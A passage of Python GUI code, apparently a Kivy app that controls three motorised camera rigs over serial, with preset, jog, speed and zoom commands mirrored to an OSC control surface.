self.root.ids.btnCam2Go5.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/13", [92, 133, 186])
client.send_message("/style/color/3/13", [255, 255, 255])
client.send_message("/style/bgcolor/5/5", [92, 133, 186])
client.send_message("/style/color/5/5", [255, 255, 255])
elif not cam2Pos5Set:
self.root.ids.btnCam2Go5.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/13", [35, 50, 70])
client.send_message("/style/color/3/13", [0, 0, 0])
client.send_message("/style/bgcolor/5/5", [35, 50, 70])
client.send_message("/style/color/5/5", [0, 0, 0])
if cam2Pos6Set != OLDcam2Pos6Set or cam2Pos6Run != OLDcam2Pos6Run or cam2AtPos6 != OLDcam2AtPos6 or resetButtons:
OLDcam2Pos6Set = cam2Pos6Set
OLDcam2Pos6Run = cam2Pos6Run
OLDcam2AtPos6 = cam2AtPos6
if cam2Pos6Set and not cam2Pos6Run and not cam2AtPos6: # Position LEDs Cam2
self.root.ids.btnCam2Go6.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/14", [35, 50, 70])
client.send_message("/style/color/3/14", [255, 0, 0])
client.send_message("/style/bgcolor/5/6", [35, 50, 70])
client.send_message("/style/color/5/6", [255, 0, 0])
elif cam2Pos6Set and not cam2Pos6Run and cam2AtPos6:
self.root.ids.btnCam2Go6.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/14", [92, 133, 186])
client.send_message("/style/color/3/14", [255, 255, 255])
client.send_message("/style/bgcolor/5/6", [92, 133, 186])
client.send_message("/style/color/5/6", [255, 255, 255])
elif not cam2Pos6Set:
self.root.ids.btnCam2Go6.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/14", [35, 50, 70])
client.send_message("/style/color/3/14", [0, 0, 0])
client.send_message("/style/bgcolor/5/6", [35, 50, 70])
client.send_message("/style/color/5/6", [0, 0, 0])
if cam3Pos1Set != OLDcam3Pos1Set or cam3Pos1Run != OLDcam3Pos1Run or cam3AtPos1 != OLDcam3AtPos1 or resetButtons:
OLDcam3Pos1Set = cam3Pos1Set
OLDcam3Pos1Run = cam3Pos1Run
OLDcam3AtPos1 = cam3AtPos1
if cam3Pos1Set and not cam3Pos1Run and not cam3AtPos1: # Set, not Run or At
self.root.ids.btnCam3Go1.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/17", [70, 62, 1])
client.send_message("/style/color/3/17", [255, 0, 0])
client.send_message("/style/bgcolor/6/1", [70, 62, 1])
client.send_message("/style/color/6/1", [255, 0, 0])
elif cam3Pos1Set and not cam3Pos1Run and cam3AtPos1: # Set & At, not Run
self.root.ids.btnCam3Go1.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/17", [186, 164, 1])
client.send_message("/style/color/3/17", [255, 255, 255])
client.send_message("/style/bgcolor/6/1", [186, 164, 1])
client.send_message("/style/color/6/1", [255, 255, 255])
elif not cam3Pos1Set:
self.root.ids.btnCam3Go1.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/17", [70, 62, 1])
client.send_message("/style/color/3/17", [0, 0, 0])
client.send_message("/style/bgcolor/6/1", [70, 62, 1])
client.send_message("/style/color/6/1", [0, 0, 0])
if cam3Pos2Set != OLDcam3Pos2Set or cam3Pos2Run != OLDcam3Pos2Run or cam3AtPos2 != OLDcam3AtPos2 or resetButtons:
OLDcam3Pos2Set = cam3Pos2Set
OLDcam3Pos2Run = cam3Pos2Run
OLDcam3AtPos2 = cam3AtPos2
if cam3Pos2Set and not cam3Pos2Run and not cam3AtPos2: # Position LEDs Cam3
self.root.ids.btnCam3Go2.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/18", [70, 62, 1])
client.send_message("/style/color/3/18", [255, 0, 0])
client.send_message("/style/bgcolor/6/2", [70, 62, 1])
client.send_message("/style/color/6/2", [255, 0, 0])
elif cam3Pos2Set and not cam3Pos2Run and cam3AtPos2:
self.root.ids.btnCam3Go2.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/18", [186, 164, 1])
client.send_message("/style/color/3/18", [255, 255, 255])
client.send_message("/style/bgcolor/6/2", [186, 164, 1])
client.send_message("/style/color/6/2", [255, 255, 255])
elif not cam3Pos2Set:
self.root.ids.btnCam3Go2.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/18", [70, 62, 1])
client.send_message("/style/color/3/18", [0, 0, 0])
client.send_message("/style/bgcolor/6/2", [70, 62, 1])
client.send_message("/style/color/6/2", [0, 0, 0])
if cam3Pos3Set != OLDcam3Pos3Set or cam3Pos3Run != OLDcam3Pos3Run or cam3AtPos3 != OLDcam3AtPos3 or resetButtons:
OLDcam3Pos3Set = cam3Pos3Set
OLDcam3Pos3Run = cam3Pos3Run
OLDcam3AtPos3 = cam3AtPos3
if cam3Pos3Set and not cam3Pos3Run and not cam3AtPos3: # Position LEDs Cam3
self.root.ids.btnCam3Go3.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/19", [70, 62, 1])
client.send_message("/style/color/3/19", [255, 0, 0])
client.send_message("/style/bgcolor/6/3", [70, 62, 1])
client.send_message("/style/color/6/3", [255, 0, 0])
elif cam3Pos3Set and not cam3Pos3Run and cam3AtPos3:
self.root.ids.btnCam3Go3.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/19", [186, 164, 1])
client.send_message("/style/color/3/19", [255, 255, 255])
client.send_message("/style/bgcolor/6/3", [186, 164, 1])
client.send_message("/style/color/6/3", [255, 255, 255])
elif not cam3Pos3Set:
self.root.ids.btnCam3Go3.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/19", [70, 62, 1])
client.send_message("/style/color/3/19", [0, 0, 0])
client.send_message("/style/bgcolor/6/3", [70, 62, 1])
client.send_message("/style/color/6/3", [0, 0, 0])
if cam3Pos4Set != OLDcam3Pos4Set or cam3Pos4Run != OLDcam3Pos4Run or cam3AtPos4 != OLDcam3AtPos4 or resetButtons:
OLDcam3Pos4Set = cam3Pos4Set
OLDcam3Pos4Run = cam3Pos4Run
OLDcam3AtPos4 = cam3AtPos4
if cam3Pos4Set and not cam3Pos4Run and not cam3AtPos4: # Position LEDs Cam3
self.root.ids.btnCam3Go4.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/20", [70, 62, 1])
client.send_message("/style/color/3/20", [255, 0, 0])
client.send_message("/style/bgcolor/6/4", [70, 62, 1])
client.send_message("/style/color/6/4", [255, 0, 0])
elif cam3Pos4Set and not cam3Pos4Run and cam3AtPos4:
self.root.ids.btnCam3Go4.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/20", [186, 164, 1])
client.send_message("/style/color/3/20", [255, 255, 255])
client.send_message("/style/bgcolor/6/4", [186, 164, 1])
client.send_message("/style/color/6/4", [255, 255, 255])
elif not cam3Pos4Set:
self.root.ids.btnCam3Go4.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/20", [70, 62, 1])
client.send_message("/style/color/3/20", [0, 0, 0])
client.send_message("/style/bgcolor/6/4", [70, 62, 1])
client.send_message("/style/color/6/4", [0, 0, 0])
if cam3Pos5Set != OLDcam3Pos5Set or cam3Pos5Run != OLDcam3Pos5Run or cam3AtPos5 != OLDcam3AtPos5 or resetButtons:
OLDcam3Pos5Set = cam3Pos5Set
OLDcam3Pos5Run = cam3Pos5Run
OLDcam3AtPos5 = cam3AtPos5
if cam3Pos5Set and not cam3Pos5Run and not cam3AtPos5: # Position LEDs Cam3
self.root.ids.btnCam3Go5.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/21", [70, 62, 1])
client.send_message("/style/color/3/21", [255, 0, 0])
client.send_message("/style/bgcolor/6/5", [70, 62, 1])
client.send_message("/style/color/6/5", [255, 0, 0])
elif cam3Pos5Set and not cam3Pos5Run and cam3AtPos5:
self.root.ids.btnCam3Go5.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/21", [186, 164, 1])
client.send_message("/style/color/3/21", [255, 255, 255])
client.send_message("/style/bgcolor/6/5", [186, 164, 1])
client.send_message("/style/color/6/5", [255, 255, 255])
elif not cam3Pos5Set:
self.root.ids.btnCam3Go5.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/21", [70, 62, 1])
client.send_message("/style/color/3/21", [0, 0, 0])
client.send_message("/style/bgcolor/6/5", [70, 62, 1])
client.send_message("/style/color/6/5", [0, 0, 0])
if cam3Pos6Set != OLDcam3Pos6Set or cam3Pos6Run != OLDcam3Pos6Run or cam3AtPos6 != OLDcam3AtPos6 or resetButtons:
OLDcam3Pos6Set = cam3Pos6Set
OLDcam3Pos6Run = cam3Pos6Run
OLDcam3AtPos6 = cam3AtPos6
if cam3Pos6Set and not cam3Pos6Run and not cam3AtPos6: # Position LEDs Cam3
self.root.ids.btnCam3Go6.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/22", [70, 62, 1])
client.send_message("/style/color/3/22", [255, 0, 0])
client.send_message("/style/bgcolor/6/6", [70, 62, 1])
client.send_message("/style/color/6/6", [255, 0, 0])
elif cam3Pos6Set and not cam3Pos6Run and cam3AtPos6:
self.root.ids.btnCam3Go6.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/22", [186, 164, 1])
client.send_message("/style/color/3/22", [255, 255, 255])
client.send_message("/style/bgcolor/6/6", [186, 164, 1])
client.send_message("/style/color/6/6", [255, 255, 255])
elif not cam3Pos6Set:
self.root.ids.btnCam3Go6.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/22", [70, 62, 1])
client.send_message("/style/color/3/22", [0, 0, 0])
client.send_message("/style/bgcolor/6/6", [70, 62, 1])
client.send_message("/style/color/6/6", [0, 0, 0])
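# Speed read-backs: resize the on-screen speed bars and update the OSC speed labels
# whenever a reported pan/tilt or slider speed changes.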
if oldCam1PTSpeed != cam1PTSpeed:
oldCam1PTSpeed = cam1PTSpeed
client.send_message("/style/text/3/7", "-")
if cam1PTSpeed == 1:
self.root.ids.cam1PTSpd.sizPT1=((xDivSet*2.25), (yDivSet*6))
client.send_message("/style/text/3/8", "+ 1/4")
client.send_message("/style/text/4/10", "Spd 1/4")
elif cam1PTSpeed == 3:
self.root.ids.cam1PTSpd.sizPT1=((xDivSet*4.5), (yDivSet*6))
client.send_message("/style/text/3/8", "+ 2/4")
client.send_message("/style/text/4/10", "Spd 2/4")
elif cam1PTSpeed == 5:
self.root.ids.cam1PTSpd.sizPT1=((xDivSet*6.75), (yDivSet*6))
client.send_message("/style/text/3/8", "+ 3/4")
client.send_message("/style/text/4/10", "Spd 3/4")
elif cam1PTSpeed == 7:
self.root.ids.cam1PTSpd.sizPT1=((xDivSet*9), (yDivSet*6))
client.send_message("/style/text/3/8", "+ 4/4")
client.send_message("/style/text/4/10", "Spd 4/4")
if oldCam2PTSpeed != cam2PTSpeed:
oldCam2PTSpeed = cam2PTSpeed
client.send_message("/style/text/3/15", "-")
if cam2PTSpeed == 1:
self.root.ids.cam2PTSpd.sizPT2=((xDivSet*2.25), (yDivSet*6))
client.send_message("/style/text/3/16", "+ 1/4")
client.send_message("/style/text/5/10", "Spd 1/4")
elif cam2PTSpeed == 3:
self.root.ids.cam2PTSpd.sizPT2=((xDivSet*4.5), (yDivSet*6))
client.send_message("/style/text/3/16", "+ 2/4")
client.send_message("/style/text/5/10", "Spd 2/4")
elif cam2PTSpeed == 5:
self.root.ids.cam2PTSpd.sizPT2=((xDivSet*6.75), (yDivSet*6))
client.send_message("/style/text/3/16", "+ 3/4")
client.send_message("/style/text/5/10", "Spd 3/4")
elif cam2PTSpeed == 7:
self.root.ids.cam2PTSpd.sizPT2=((xDivSet*9), (yDivSet*6))
client.send_message("/style/text/3/16", "+ 4/4")
client.send_message("/style/text/5/10", "Spd 4/4")
if oldCam3PTSpeed != cam3PTSpeed:
oldCam3PTSpeed = cam3PTSpeed
client.send_message("/style/text/3/23", "-")
if cam3PTSpeed == 1:
self.root.ids.cam3PTSpd.sizPT3=((xDivSet*2.25), (yDivSet*6))
client.send_message("/style/text/3/24", "+ 1/4")
client.send_message("/style/text/6/10", "Spd 1/4")
elif cam3PTSpeed == 3:
self.root.ids.cam3PTSpd.sizPT3=((xDivSet*4.5), (yDivSet*6))
client.send_message("/style/text/3/24", "+ 2/4")
client.send_message("/style/text/6/10", "Spd 2/4")
elif cam3PTSpeed == 5:
self.root.ids.cam3PTSpd.sizPT3=((xDivSet*6.75), (yDivSet*6))
client.send_message("/style/text/3/24", "+ 3/4")
client.send_message("/style/text/6/10", "Spd 3/4")
elif cam3PTSpeed == 7:
self.root.ids.cam3PTSpd.sizPT3=((xDivSet*9), (yDivSet*6))
client.send_message("/style/text/3/24", "+ 4/4")
client.send_message("/style/text/6/10", "Spd 4/4")
if oldCam1Speed != cam1SliderSpeed:
oldCam1Speed = cam1SliderSpeed
if cam1SliderSpeed == 1:
self.root.ids.cam1SlSpd.sizSl1=((xDivSet*1.29), (yDivSet*6))
elif cam1SliderSpeed == 2:
self.root.ids.cam1SlSpd.sizSl1=((xDivSet*2.57), (yDivSet*6))
elif cam1SliderSpeed == 3:
self.root.ids.cam1SlSpd.sizSl1=((xDivSet*3.86), (yDivSet*6))
elif cam1SliderSpeed == 4:
self.root.ids.cam1SlSpd.sizSl1=((xDivSet*5.14), (yDivSet*6))
elif cam1SliderSpeed == 5:
self.root.ids.cam1SlSpd.sizSl1=((xDivSet*6.43), (yDivSet*6))
elif cam1SliderSpeed == 6:
self.root.ids.cam1SlSpd.sizSl1=((xDivSet*7.71), (yDivSet*6))
elif cam1SliderSpeed == 7:
self.root.ids.cam1SlSpd.sizSl1=((xDivSet*9), (yDivSet*6))
if oldCam2Speed != cam2SliderSpeed:
oldCam2Speed = cam2SliderSpeed
if cam2SliderSpeed == 1:
self.root.ids.cam2SlSpd.sizSl2=((xDivSet*1.29), (yDivSet*6))
elif cam2SliderSpeed == 2:
self.root.ids.cam2SlSpd.sizSl2=((xDivSet*2.57), (yDivSet*6))
elif cam2SliderSpeed == 3:
self.root.ids.cam2SlSpd.sizSl2=((xDivSet*3.86), (yDivSet*6))
elif cam2SliderSpeed == 4:
self.root.ids.cam2SlSpd.sizSl2=((xDivSet*5.14), (yDivSet*6))
elif cam2SliderSpeed == 5:
self.root.ids.cam2SlSpd.sizSl2=((xDivSet*6.43), (yDivSet*6))
elif cam2SliderSpeed == 6:
self.root.ids.cam2SlSpd.sizSl2=((xDivSet*7.71), (yDivSet*6))
elif cam2SliderSpeed == 7:
self.root.ids.cam2SlSpd.sizSl2=((xDivSet*9), (yDivSet*6))
if oldCam3Speed != cam3SliderSpeed:
oldCam3Speed = cam3SliderSpeed
if cam3SliderSpeed == 1:
self.root.ids.cam3SlSpd.sizSl3=((xDivSet*1.29), (yDivSet*6))
elif cam3SliderSpeed == 2:
self.root.ids.cam3SlSpd.sizSl3=((xDivSet*2.57), (yDivSet*6))
elif cam3SliderSpeed == 3:
self.root.ids.cam3SlSpd.sizSl3=((xDivSet*3.86), (yDivSet*6))
elif cam3SliderSpeed == 4:
self.root.ids.cam3SlSpd.sizSl3=((xDivSet*5.14), (yDivSet*6))
elif cam3SliderSpeed == 5:
self.root.ids.cam3SlSpd.sizSl3=((xDivSet*6.43), (yDivSet*6))
elif cam3SliderSpeed == 6:
self.root.ids.cam3SlSpd.sizSl3=((xDivSet*7.71), (yDivSet*6))
elif cam3SliderSpeed == 7:
self.root.ids.cam3SlSpd.sizSl3=((xDivSet*9), (yDivSet*6))
resetButtons = False
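# whichCamSerial picks which camera the shared joystick buttons below act on.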
def whichCamSerial1(self):
global whichCamSerial
whichCamSerial = 1
self.root.ids.buttonWhichCam1.line_color=(1, 0, 0, 1)
self.root.ids.buttonWhichCam2.line_color=(.13, .13, .13, 1)
self.root.ids.buttonWhichCam3.line_color=(.13, .13, .13, 1)
def whichCamSerial2(self):
global whichCamSerial
whichCamSerial = 2
self.root.ids.buttonWhichCam1.line_color=(.13, .13, .13, 1)
self.root.ids.buttonWhichCam2.line_color=(1, 0, 0, 1)
self.root.ids.buttonWhichCam3.line_color=(.13, .13, .13, 1)
def whichCamSerial3(self):
global whichCamSerial
whichCamSerial = 3
self.root.ids.buttonWhichCam1.line_color=(.13, .13, .13, 1)
self.root.ids.buttonWhichCam2.line_color=(.13, .13, .13, 1)
self.root.ids.buttonWhichCam3.line_color=(1, 0, 0, 1)
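# Joystick jog commands. The leading pair routes the command: '??' = camera 1, '!?' = camera 2,
# '@?' = camera 3; the letter selects the axis (P = pan, T = tilt, X = slider) and the number is
# the relative step (the units are whatever the firmware uses - assumed degrees / millimetres).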
def joyL10(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??P-10')
elif whichCamSerial == 2:
self.sendSerial('!?P-10')
elif whichCamSerial == 3:
self.sendSerial('@?P-10')
def joyL1(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??P-0.5')
elif whichCamSerial == 2:
self.sendSerial('!?P-0.5')
elif whichCamSerial == 3:
self.sendSerial('@?P-0.5')
def joyR1(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??P0.5')
elif whichCamSerial == 2:
self.sendSerial('!?P0.5')
elif whichCamSerial == 3:
self.sendSerial('@?P0.5')
def joyR10(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??P10')
elif whichCamSerial == 2:
self.sendSerial('!?P10')
elif whichCamSerial == 3:
self.sendSerial('@?P10')
def joyU10(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??T10')
elif whichCamSerial == 2:
self.sendSerial('!?T10')
elif whichCamSerial == 3:
self.sendSerial('@?T10')
def joyU1(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??T0.5')
elif whichCamSerial == 2:
self.sendSerial('!?T0.5')
elif whichCamSerial == 3:
self.sendSerial('@?T0.5')
def joyD1(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??T-0.5')
elif whichCamSerial == 2:
self.sendSerial('!?T-0.5')
elif whichCamSerial == 3:
self.sendSerial('@?T-0.5')
def joyD10(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??T-10')
elif whichCamSerial == 2:
self.sendSerial('!?T-10')
elif whichCamSerial == 3:
self.sendSerial('@?T-10')
def joySL100(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??X-100')
elif whichCamSerial == 2:
self.sendSerial('!?X-100')
elif whichCamSerial == 3:
self.sendSerial('@?X-100')
def joySL10(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??X-10')
elif whichCamSerial == 2:
self.sendSerial('!?X-10')
elif whichCamSerial == 3:
self.sendSerial('@?X-10')
def joySR10(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??X10')
elif whichCamSerial == 2:
self.sendSerial('!?X10')
elif whichCamSerial == 3:
self.sendSerial('@?X10')
def joySR100(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??X100')
elif whichCamSerial == 2:
self.sendSerial('!?X100')
elif whichCamSerial == 3:
self.sendSerial('@?X100')
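# Same jog commands as above, but the target camera is passed in by the OSC handler
# instead of coming from whichCamSerial.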
def joyL10OSC(self, cam):
if cam == 1:
self.sendSerial('??P-10')
elif cam == 2:
self.sendSerial('!?P-10')
elif cam == 3:
self.sendSerial('@?P-10')
def joyL1OSC(self, cam):
if cam == 1:
self.sendSerial('??P-0.1')
elif cam == 2:
self.sendSerial('!?P-0.1')
elif cam == 3:
self.sendSerial('@?P-0.1')
def joyR1OSC(self, cam):
if cam == 1:
self.sendSerial('??P0.1')
elif cam == 2:
self.sendSerial('!?P0.1')
elif cam == 3:
self.sendSerial('@?P0.1')
def joyR10OSC(self, cam):
if cam == 1:
self.sendSerial('??P10')
elif cam == 2:
self.sendSerial('!?P10')
elif cam == 3:
self.sendSerial('@?P10')
def joyU10OSC(self, cam):
if cam == 1:
self.sendSerial('??T10')
elif cam == 2:
self.sendSerial('!?T10')
elif cam == 3:
self.sendSerial('@?T10')
def joyU1OSC(self, cam):
if cam == 1:
self.sendSerial('??T0.1')
elif cam == 2:
self.sendSerial('!?T0.1')
elif cam == 3:
self.sendSerial('@?T0.1')
def joyD1OSC(self, cam):
if cam == 1:
self.sendSerial('??T-0.1')
elif cam == 2:
self.sendSerial('!?T-0.1')
elif cam == 3:
self.sendSerial('@?T-0.1')
def joyD10OSC(self, cam):
if cam == 1:
self.sendSerial('??T-10')
elif cam == 2:
self.sendSerial('!?T-10')
elif cam == 3:
self.sendSerial('@?T-10')
def joySL100OSC(self, cam):
if cam == 1:
self.sendSerial('??X-100')
elif cam == 2:
self.sendSerial('!?X-100')
elif cam == 3:
self.sendSerial('@?X-100')
def joySL10OSC(self, cam):
if cam == 1:
self.sendSerial('??X-10')
elif cam == 2:
self.sendSerial('!?X-10')
elif cam == 3:
self.sendSerial('@?X-10')
def joySR10OSC(self, cam):
if cam == 1:
self.sendSerial('??X10')
elif cam == 2:
self.sendSerial('!?X10')
elif cam == 3:
self.sendSerial('@?X10')
def joySR100OSC(self, cam):
if cam == 1:
self.sendSerial('??X100')
elif cam == 2:
self.sendSerial('!?X100')
elif cam == 3:
self.sendSerial('@?X100')
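# Preset Go buttons. With SetPosToggle active, setPos(3) is called and the upper-case '&'
# command stores the current position in that slot; otherwise the lower-case command recalls
# the preset, and only if it has been set and the camera is not already there.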
def Cam1Go1(self):
global SetPosToggle
global cam1Pos1Set
global cam1AtPos1
if SetPosToggle:
self.setPos(3)
self.sendSerial('&Z')
return
elif cam1Pos1Set and not cam1AtPos1:
self.sendSerial('&z')
def Cam1Go2(self):
global SetPosToggle
global cam1Pos2Set
global cam1AtPos2
if SetPosToggle:
self.setPos(3)
self.sendSerial('&X')
return
elif cam1Pos2Set and not cam1AtPos2:
self.sendSerial('&x')
def Cam1Go3(self):
global SetPosToggle
global cam1Pos3Set
global cam1AtPos3
if SetPosToggle:
self.setPos(3)
self.sendSerial('&C')
return
elif cam1Pos3Set and not cam1AtPos3:
self.sendSerial('&c')
def Cam1Go4(self):
global SetPosToggle
global cam1Pos4Set
global cam1AtPos4
if SetPosToggle:
self.setPos(3)
self.sendSerial('&V')
return
elif cam1Pos4Set and not cam1AtPos4:
self.sendSerial('&v')
def Cam1Go5(self):
global SetPosToggle
global cam1Pos5Set
global cam1AtPos5
if SetPosToggle:
self.setPos(3)
self.sendSerial('&B')
return
elif cam1Pos5Set and not cam1AtPos5:
self.sendSerial('&b')
def Cam1Go6(self):
global SetPosToggle
global cam1Pos6Set
global cam1AtPos6
if SetPosToggle:
self.setPos(3)
self.sendSerial('&N')
return
elif cam1Pos6Set and not cam1AtPos6:
self.sendSerial('&n')
def Cam2Go1(self):
global SetPosToggle
global cam2Pos1Set
global cam2AtPos1
if SetPosToggle:
self.setPos(3)
self.sendSerial('&A')
return
elif cam2Pos1Set and not cam2AtPos1:
self.sendSerial('&a')
def Cam2Go2(self):
global SetPosToggle
global cam2Pos2Set
global cam2AtPos2
if SetPosToggle:
self.setPos(3)
self.sendSerial('&S')
return
elif cam2Pos2Set and not cam2AtPos2:
self.sendSerial('&s')
def Cam2Go3(self):
global SetPosToggle
global cam2Pos3Set
global cam2AtPos3
if SetPosToggle:
self.setPos(3)
self.sendSerial('&D')
return
elif cam2Pos3Set and not cam2AtPos3:
self.sendSerial('&d')
def Cam2Go4(self):
global SetPosToggle
global cam2Pos4Set
global cam2AtPos4
if SetPosToggle:
self.setPos(3)
self.sendSerial('&F')
return
elif cam2Pos4Set and not cam2AtPos4:
self.sendSerial('&f')
def Cam2Go5(self):
global SetPosToggle
global cam2Pos5Set
global cam2AtPos5
if SetPosToggle:
self.setPos(3)
self.sendSerial('&G')
return
elif cam2Pos5Set and not cam2AtPos5:
self.sendSerial('&g')
def Cam2Go6(self):
global SetPosToggle
global cam2Pos6Set
global cam2AtPos6
if SetPosToggle:
self.setPos(3)
self.sendSerial('&H')
return
elif cam2Pos6Set and not cam2AtPos6:
self.sendSerial('&h')
def Cam3Go1(self):
global SetPosToggle
global cam3Pos1Set
global cam3AtPos1
if SetPosToggle:
self.setPos(3)
self.sendSerial('&Q')
return
elif cam3Pos1Set and not cam3AtPos1:
self.sendSerial('&q')
def Cam3Go2(self):
global SetPosToggle
global cam3Pos2Set
global cam3AtPos2
if SetPosToggle:
self.setPos(3)
self.sendSerial('&W')
return
elif cam3Pos2Set and not cam3AtPos2:
self.sendSerial('&w')
def Cam3Go3(self):
global SetPosToggle
global cam3Pos3Set
global cam3AtPos3
if SetPosToggle:
self.setPos(3)
self.sendSerial('&E')
return
elif cam3Pos3Set and not cam3AtPos3:
self.sendSerial('&e')
def Cam3Go4(self):
global SetPosToggle
global cam3Pos4Set
global cam3AtPos4
if SetPosToggle:
self.setPos(3)
self.sendSerial('&R')
return
elif cam3Pos4Set and not cam3AtPos4:
self.sendSerial('&r')
def Cam3Go5(self):
global SetPosToggle
global cam3Pos5Set
global cam3AtPos5
if SetPosToggle:
self.setPos(3)
self.sendSerial('&T')
return
elif cam3Pos5Set and not cam3AtPos5:
self.sendSerial('&t')
def Cam3Go6(self):
global SetPosToggle
global cam3Pos6Set
global cam3AtPos6
if SetPosToggle:
self.setPos(3)
self.sendSerial('&Y')
return
elif cam3Pos6Set and not cam3AtPos6:
self.sendSerial('&y')
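# Pan/tilt speed stepping: '&+<cam><level>' asks the controller for a new speed level; a lower
# trailing digit appears to select a faster speed (4 = slowest, 1 = fastest), and the controller
# confirms the change back via an '=@<cam><n>' message.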
def sendCam1PTSpeedInc(self):
global cam1PTSpeed
if cam1PTSpeed == 1:
self.sendSerial('&+13')
elif cam1PTSpeed == 3:
self.sendSerial('&+12')
elif cam1PTSpeed == 5:
self.sendSerial('&+11')
elif cam1PTSpeed == 7:
return
def sendCam1PTSpeedDec(self):
global cam1PTSpeed
if cam1PTSpeed == 7:
self.sendSerial('&+12')
elif cam1PTSpeed == 5:
self.sendSerial('&+13')
elif cam1PTSpeed == 3:
self.sendSerial('&+14')
elif cam1PTSpeed == 1:
return
def sendCam2PTSpeedInc(self):
global cam2PTSpeed
if cam2PTSpeed == 1:
self.sendSerial('&+23')
elif cam2PTSpeed == 3:
self.sendSerial('&+22')
elif cam2PTSpeed == 5:
self.sendSerial('&+21')
elif cam2PTSpeed == 7:
return
def sendCam2PTSpeedDec(self):
global cam2PTSpeed
if cam2PTSpeed == 7:
self.sendSerial('&+22')
elif cam2PTSpeed == 5:
self.sendSerial('&+23')
elif cam2PTSpeed == 3:
self.sendSerial('&+24')
elif cam2PTSpeed == 1:
return
def sendCam3PTSpeedInc(self):
global cam3PTSpeed
if cam3PTSpeed == 1:
self.sendSerial('&+33')
elif cam3PTSpeed == 3:
self.sendSerial('&+32')
elif cam3PTSpeed == 5:
self.sendSerial('&+31')
elif cam3PTSpeed == 7:
return
def sendCam3PTSpeedDec(self):
global cam3PTSpeed
if cam3PTSpeed == 7:
self.sendSerial('&+32')
elif cam3PTSpeed == 5:
self.sendSerial('&+33')
elif cam3PTSpeed == 3:
self.sendSerial('&+34')
elif cam3PTSpeed == 1:
return
def sendCam2PTSpeedOSC(self, OSC):
#print(OSC)
if OSC == 0:
self.sendSerial('&+24')
elif OSC == 1:
self.sendSerial('&+23')
elif OSC == 2:
self.sendSerial('&+22')
elif OSC == 3:
self.sendSerial('&+21')
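# Slider speed stepping: the upper-case letter increases and the lower-case letter decreases;
# the new value comes back as '=<cam><n>'.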
def sendCam1SliderSpeedInc(self):
self.sendSerial('&M')
def sendCam1SliderSpeedDec(self):
self.sendSerial('&m')
def sendCam2SliderSpeedInc(self):
self.sendSerial('&J')
def sendCam2SliderSpeedDec(self):
self.sendSerial('&j')
def sendCam3SliderSpeedInc(self):
self.sendSerial('&U')
def sendCam3SliderSpeedDec(self):
self.sendSerial('&u')
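# Zoom jog: the camNisZooming flag is held while a zoom is in progress and cleared by the
# matching stop command.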
def sendCam1ZoomIn(self):
global cam1isZooming
cam1isZooming = True
self.sendSerial('&<')
def sendCam1ZoomOut(self):
global cam1isZooming
cam1isZooming = True
self.sendSerial('&,')
def sendCam1ZoomStop(self):
global cam1isZooming
cam1isZooming = False
self.sendSerial('&>')
def sendCam2ZoomIn(self):
global cam2isZooming
cam2isZooming = True
self.sendSerial('&K')
def sendCam2ZoomOut(self):
global cam2isZooming
cam2isZooming = True
self.sendSerial('&k')
def sendCam2ZoomStop(self):
global cam2isZooming
cam2isZooming = False
self.sendSerial('&L')
def sendCam3ZoomIn(self):
global cam3isZooming
cam3isZooming = True
self.sendSerial('&I')
def sendCam3ZoomOut(self):
global cam3isZooming
cam3isZooming = True
self.sendSerial('&i')
def sendCam3ZoomStop(self):
global cam3isZooming
cam3isZooming = False
self.sendSerial('&O')
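# Clear every stored preset on one camera (the cached flags are reset when the controller
# reports '~C00' back through readSerial()).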
def sendClearCam1Pos(self):
self.sendSerial('&%')
def sendClearCam2Pos(self):
self.sendSerial('&^')
def sendClearCam3Pos(self):
self.sendSerial('&&')
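# flash() brightens any preset button whose move is still running (Run set, At not yet set),
# both on screen and on the OSC surface, then schedules setNormal() half a second later to dim
# the same buttons again, producing the blink.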
def flash(self, dt):
global cam1Pos1Run
global cam1Pos2Run
global cam1Pos3Run
global cam1Pos4Run
global cam1Pos5Run
global cam1Pos6Run
global cam2Pos1Run
global cam2Pos2Run
global cam2Pos3Run
global cam2Pos4Run
global cam2Pos5Run
global cam2Pos6Run
global cam3Pos1Run
global cam3Pos2Run
global cam3Pos3Run
global cam3Pos4Run
global cam3Pos5Run
global cam3Pos6Run
global cam1AtPos1
global cam1AtPos2
global cam1AtPos3
global cam1AtPos4
global cam1AtPos5
global cam1AtPos6
global cam2AtPos1
global cam2AtPos2
global cam2AtPos3
global cam2AtPos4
global cam2AtPos5
global cam2AtPos6
global cam3AtPos1
global cam3AtPos2
